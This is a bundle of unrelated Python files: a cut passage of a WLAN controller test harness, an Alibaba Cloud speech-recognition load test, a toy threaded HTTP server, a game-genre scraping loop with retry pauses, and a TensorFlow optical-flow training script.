if current_fw == latest_fw:
return False
else:
return True
def is_fw_available(self, fw_version=None):
self.sdk_client.refresh_instance()
if fw_version is None:
exit()
try:
firmware_version = self.firmware_client.get_firmware_version_by_name(
firmware_version_name=fw_version)
firmware_version = firmware_version._id
print("Firmware ID: ", firmware_version)
except Exception as e:
print(e)
firmware_version = False
print("firmware not available: ", firmware_version)
return firmware_version
# This is for Unit tests on Controller Library
if __name__ == '__main__':
controller = {
'url': "https://wlan-portal-svc-nola-ext-04.cicd.lab.wlan.tip.build", # API base url for the controller
'username': 'support@example.com',
'password': 'support',
'version': "1.1.0-SNAPSHOT",
'commit_date': "2021-04-27"
}
api = Controller(controller_data=controller)
profile = ProfileUtility(sdk_client=api)
profile_data = {
"name": "test-rf-wifi-6",
"is2dot4GHz": {},
"is5GHz": {"channelBandwidth": "is20MHz"},
"is5GHzL": {"channelBandwidth": "is20MHz"},
"is5GHzU": {"channelBandwidth": "is20MHz"}
}
profile.set_rf_profile(profile_data=profile_data, mode="wifi6")
print(profile.default_profiles["rf"])
# profile.cleanup_profiles()
# profile.get_default_profiles()
# profile_data = {
# "profile_name": "ssid_wep_2g",
# "ssid_name": "ssid_wep_2g",
# "appliedRadios": ["is2dot4GHz"],
# "default_key_id" : 1,
# "wep_key" : 1234567890,
# "vlan": 1,
# "mode": "BRIDGE"
# }
# profile.create_wep_ssid_profile(profile_data=profile_data)
# print(profile.get_profile_by_name(profile_name="wpa_wpa2_eap"))
# profile.get_default_profiles()
api.disconnect_Controller()
|
test_sr.py
|
import time
import threading
import sys
import nls
URL="wss://nls-gateway.cn-shanghai.aliyuncs.com/ws/v1"
AKID="Your AKID"
AKKEY="Your AKSECRET"
APPKEY="Your APPKEY"
class TestSr:
def __init__(self, tid, test_file):
self.__th = threading.Thread(target=self.__test_run)
self.__id = tid
self.__test_file = test_file
def loadfile(self, filename):
with open(filename, "rb") as f:
self.__data = f.read()
def start(self):
self.loadfile(self.__test_file)
self.__th.start()
def test_on_start(self, message, *args):
print("test_on_start:{}".format(message))
def test_on_error(self, message, *args):
print("on_error args=>{}".format(args))
def test_on_close(self, *args):
print("on_close: args=>{}".format(args))
def test_on_result_chg(self, message, *args):
print("test_on_chg:{}".format(message))
def test_on_completed(self, message, *args):
print("on_completed:args=>{} message=>{}".format(args, message))
def __test_run(self):
print("thread:{} start..".format(self.__id))
sr = nls.NlsSpeechRecognizer(
url=URL,
akid=AKID,
aksecret=AKKEY,
appkey=APPKEY,
on_start=self.test_on_start,
on_result_changed=self.test_on_result_chg,
on_completed=self.test_on_completed,
on_error=self.test_on_error,
on_close=self.test_on_close,
callback_args=[self.__id]
)
while True:
print("{}: session start".format(self.__id))
r = sr.start(aformat="pcm", ex={"hello":123})
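# Chunk the raw PCM into 640-byte slices; assuming the SDK default of 16 kHz,
# 16-bit mono audio, each slice is 20 ms of speech, sent every 10 ms (faster
# than real time, which is fine for a file-based test).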
self.__slices = zip(*(iter(self.__data),) * 640)
for i in self.__slices:
sr.send_audio(bytes(i))
time.sleep(0.01)
r = sr.stop()
print("{}: sr stopped:{}".format(self.__id, r))
time.sleep(5)
def multiruntest(num=500):
for i in range(0, num):
name = "thread" + str(i)
t = TestSr(name, "tests/test1.pcm")
t.start()
nls.enableTrace(True)
multiruntest(1)
|
py_threaded.py
|
import socket
from threading import Thread
def handle_request(client):
client.sendall(b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 11\r\n\r\nhello world\r\n")
client.close()
def run_server():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
server.bind(('localhost', 8002))
server.listen()
print("start listening...")
while True:
try:
client, _ = server.accept()
Thread(target=handle_request, args=(client,)).start()
except KeyboardInterrupt:
break
if __name__ == "__main__":
run_server()
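# Quick manual check from another shell (port 8002 as bound above):
#   curl -v http://localhost:8002/
# Each accepted connection is answered by its own short-lived thread.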
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from timeit import default_timer
from threading import Thread
import time
import sys
sys.path.append('genre_translate_file')
import create as create_genre_translate
from db import db_create_backup, Dump, db
from common_utils import get_parsers, get_games_list, wait, get_logger, AtomicCounter, seconds_to_str, print_parsers
IGNORE_SITE_NAMES = ['gamefaqs_gamespot_com']
# Test
USE_FAKE_PARSER = False
if USE_FAKE_PARSER:
class FakeParser:
@classmethod
def get_site_name(cls): return "<test>"
@staticmethod
def get_game_genres(game_name):
if game_name == 'Foo':
raise Exception('Error')
return ['RGB-bar', 'Action-bar']
# Monkey Patch
def get_parsers():
return [FakeParser]
def get_games_list(): return ['Foo', 'Bar', 'Zet']
log = get_logger()
counter = AtomicCounter()
def run_parser(parser, games: list, max_num_request=5):
try:
pauses = [
('15 minutes', 15 * 60),
('30 minutes', 30 * 60),
('45 minutes', 45 * 60),
('1 hour', 60 * 60),
]
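# Escalating back-off table: after the n-th failed request for a game, sleep pauses[n - 1]
# seconds before retrying; retries stop once max_num_request attempts have been made.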
SITE_NAME = parser.get_site_name()
timeout = 3 # 3 seconds
MAX_TIMEOUT = 10 # 10 seconds
TIMEOUT_EVERY_N_GAMES = 50 # Every 50 games
TIMEOUT_BETWEEN_N_GAMES = 3 * 60 # 3 minutes
number = 0
for game_name in games:
try:
if Dump.exists(SITE_NAME, game_name):
continue
number += 1
num_request = 0
while True:
num_request += 1
try:
if num_request == 1:
log.info(f'#{number}. Search genres for {game_name!r} ({SITE_NAME})')
else:
log.info(f'#{number}. Search genres for {game_name!r} ({SITE_NAME}). '
f'Attempts {num_request}/{max_num_request}')
genres = parser.get_game_genres(game_name)
log.info(f'#{number}. Found genres {game_name!r} ({SITE_NAME}): {genres}')
Dump.add(SITE_NAME, game_name, genres)
counter.inc()
time.sleep(timeout)
break
except:
log.exception(f'#{number}. Error on request {num_request}/{max_num_request} ({SITE_NAME})')
if num_request >= max_num_request:
log.info(f'#{number}. Attempts ended for {game_name!r} ({SITE_NAME})')
break
pause_text, pause_secs = pauses[num_request - 1]
log.info(f'#{number}. Pause: {pause_text} ({pause_secs} secs)')
time.sleep(pause_secs)
timeout += 1
if timeout > MAX_TIMEOUT:
timeout = MAX_TIMEOUT
if number % TIMEOUT_EVERY_N_GAMES == 0:
log.info(
f'#{number}. Pause for every {TIMEOUT_EVERY_N_GAMES} games: {TIMEOUT_BETWEEN_N_GAMES} secs'
)
time.sleep(TIMEOUT_BETWEEN_N_GAMES)
except:
log.exception(f'#{number}. Error by game {game_name!r} ({SITE_NAME})')
except:
log.exception(f'Error:')
if __name__ == "__main__":
parsers = [x for x in get_parsers() if x.get_site_name() not in IGNORE_SITE_NAMES]
print_parsers(parsers, log=lambda *args, **kwargs: log.info(*args, **kwargs))
while True:
try:
log.info(f'Started')
t = default_timer()
db_create_backup()
games = get_games_list()
log.info(f'Total games: {len(games)}')
threads = []
for parser in parsers:
threads.append(
Thread(target=run_parser, args=[parser, games])
)
log.info(f'Total parsers/threads: {len(threads)}')
log.info(f'Ignore parsers ({len(IGNORE_SITE_NAMES)}): {", ".join(IGNORE_SITE_NAMES)}')
counter.value = 0
for thread in threads:
thread.start()
for thread in threads:
thread.join()
log.info(f'Finished. Added games: {counter.value}. Total games: {Dump.select().count()}. '
f'Elapsed time: {seconds_to_str(default_timer() - t)}')
create_genre_translate.run()
wait(days=1)
except:
log.exception('')
wait(minutes=15)
finally:
log.info('')
|
train.py
|
# --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# Heavily modified by David Michelman
# --------------------------------------------------------
"""Train a nerual network"""
from fcn.config import cfg
from gt_flow_data_layer.layer import GtFlowDataLayer
from gt_lov_correspondence_layer.layer import GtLOVFlowDataLayer
from gt_lov_synthetic_layer.layer import GtLOVSyntheticLayer
from utils.timer import Timer
import time
import os
import tensorflow as tf
import threading
from utils.yellowfin import YFOptimizer
pause_data_input = False
loader_paused = False
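# Handshake flags for the asynchronous data loader: another thread can set pause_data_input
# to True, and load_and_enqueue() acknowledges by holding loader_paused = True until the
# flag is cleared again.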
class SolverWrapper(object):
"""A simple wrapper around Tensorflow's solver. It manages saving checkpoints and deleting old checkpoints.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
# For checkpoint
self.saver = tf.train.Saver()
def snapshot(self, sess, iter):
"""Save the network's weights."""
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix +
'_iter_{:d}'.format(iter+1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
self.saver.save(sess, filename)
print 'Wrote snapshot to: {:s}'.format(filename)
def train_model(self, sess, train_op, loss, learning_rate, max_iters, net=None):
"""Network training loop."""
# add summary
tf.summary.scalar('loss', loss)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# initialize variables
print "initializing variables"
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None and str(self.pretrained_model).find('.npy') != -1:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
elif self.pretrained_model is not None and str(self.pretrained_model).find('.ckpt') != -1:
print ('Loading checkpoint from {:s}').format(self.pretrained_model)
self.saver.restore(sess, self.pretrained_model)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
start_iter = 0
if self.pretrained_model is not None and str(self.pretrained_model).find('.ckpt') != -1:
start_index = str(self.pretrained_model).find('iter_') + 5
end_index = str(self.pretrained_model).find('.ckpt')
start_iter = int(self.pretrained_model[start_index : end_index])
loss_history = list()
timer = Timer()
for iter in range(start_iter, max_iters):
timer.tic()
queue_size = sess.run(net.queue_size_op)
while sess.run(net.queue_size_op) == 0:
time.sleep(0.005)
summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op, ])
train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %7.4f, lr: %0.2e, time: %1.2f, queue size before training op: %3i' %\
(iter+1, max_iters, loss_value, lr, timer.diff, queue_size)
loss_history.append(loss_value)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if cfg.TRAIN.DELETE_OLD_CHECKPOINTS:
base_dir = os.getcwd()
try:
os.chdir(self.output_dir)
while True:
files = sorted(os.listdir("."), key=os.path.getctime)
if len(files) < 20:
break
while files[0].find(".") == -1:
files.pop(0)
os.remove(files[0])
except IndexError:
pass
finally:
os.chdir(base_dir)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def load_and_enqueue(sess, net, roidb, num_classes, coord):
global loader_paused
assert cfg.TRAIN.OPTICAL_FLOW, "this network can only do optical flow"
# data layer
if cfg.IMDB_NAME.count("lov_synthetic") != 0:
data_layer = GtLOVSyntheticLayer(roidb, num_classes)
elif cfg.INPUT == "LEFT_RIGHT_CORRESPONDENCE":
data_layer = GtLOVFlowDataLayer(roidb, num_classes)
else:
data_layer = GtFlowDataLayer(roidb, num_classes)
while not coord.should_stop():
while pause_data_input:
loader_paused = True
time.sleep(0.001)
loader_paused = False
while sess.run(net.queue_size_op) > net.queue_size - 1:
time.sleep(0.01)
blobs = data_layer.forward()
left_blob = blobs['left_image']
right_blob = blobs['right_image']
flow_blob = blobs['flow']
occluded_blob = blobs['occluded']
left_labels = blobs['left_labels']
right_labels = blobs['right_labels']
feed_dict = {net.data_left: left_blob, net.data_right: right_blob, net.gt_flow: flow_blob,
net.occluded: occluded_blob, net.labels_left: left_labels, net.labels_right: right_labels, net.keep_prob: 1.0}
try:
sess.run(net.enqueue_op, feed_dict=feed_dict)
except tf.errors.CancelledError as e:
print "queue closed, loader thread exiting"
break
if sess.run(net.queue_size_op) > 18:
time.sleep(0.0) # yield to training thread
def train_flow(network, imdb, roidb, output_dir, pretrained_model=None, max_iters=40000, n_cpu_threads=1):
"""Train a Fast R-CNN network."""
loss = network.get_output('final_triplet_loss')[0]
# optimizer
global_step = tf.Variable(0, trainable=False)
if cfg.TRAIN.OPTIMIZER.lower() == 'momentumoptimizer' or cfg.TRAIN.OPTIMIZER.lower() == 'momentum':
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
elif cfg.TRAIN.OPTIMIZER.lower() == 'adam':
train_op = tf.train.AdamOptimizer(learning_rate=cfg.TRAIN.LEARNING_RATE_ADAM).minimize(loss, global_step=global_step)
learning_rate = tf.constant(cfg.TRAIN.LEARNING_RATE_ADAM)
elif cfg.TRAIN.OPTIMIZER.lower() == 'yellowfin':
# This didn't work at all
optimizer = YFOptimizer(zero_debias=False, learning_rate=cfg.TRAIN.LEARNING_RATE, momentum=0.0)
train_op = optimizer.minimize(loss, global_step=global_step)
learning_rate = optimizer.get_lr_tensor()
else:
assert False, "An optimizer must be specified"
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, intra_op_parallelism_threads=n_cpu_threads)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model)
# thread to load data
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, network, roidb, imdb.num_classes, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, network, roidb, imdb.num_classes, coord))
t.start()
print 'Solving...'
sw.train_model(sess, train_op, loss, learning_rate, max_iters, net = network)
print 'done solving'
sess.run(network.close_queue_op)
coord.request_stop()
coord.join([t])
|